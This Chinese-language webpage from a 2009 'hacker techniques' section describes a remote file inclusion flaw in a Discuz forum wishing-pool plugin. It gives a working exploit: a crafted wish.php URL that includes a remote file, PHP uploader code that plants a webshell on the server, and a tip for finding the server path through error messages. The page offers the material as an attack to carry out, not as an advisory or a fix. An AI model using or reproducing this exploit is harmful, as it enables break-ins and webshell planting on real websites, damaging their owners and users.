当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > discuz许愿池插件远程包含漏洞

黑客技术
黑客教你破解QQ键盘保护
穷追猛打彻底清除掉rootkit
教你去除暴风影音的stormliv.exe
6种现象表明你的电脑已成为肉鸡
揭露网站攻击行业的内幕
端午节病毒模仿杀毒软件骗钱 谨防挂马网站
360安全卫士声称长期“挂马”网站将被屏蔽
黑客是如何盗取QQ密码的?
解析具有黑客行为的攻击与扫描
挂马方法和技巧大汇总
华中科大黑链遍布网页底部 疑遭黑客入侵
针对微软“DirectShow”漏洞挂马攻击将爆发
毕业论文不翼而飞 病毒施计陷害杀毒软件
黑客跟风油价上涨 中石油集团官网被挂马
江民6月7日病毒播报:QQ大盗改IE主页
黑客与“招安”策略-值得探讨
东欧ATM取款机惊现木马 钱包受到威胁
通网网站被大规模挂马 15个频道中毒
黑客常用的几种入侵端口的方法
追逐利益 黑客经济早已成了赚钱的买卖

黑客技术 中的 discuz许愿池插件远程包含漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 132 ::
收藏到网摘: n/a

许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。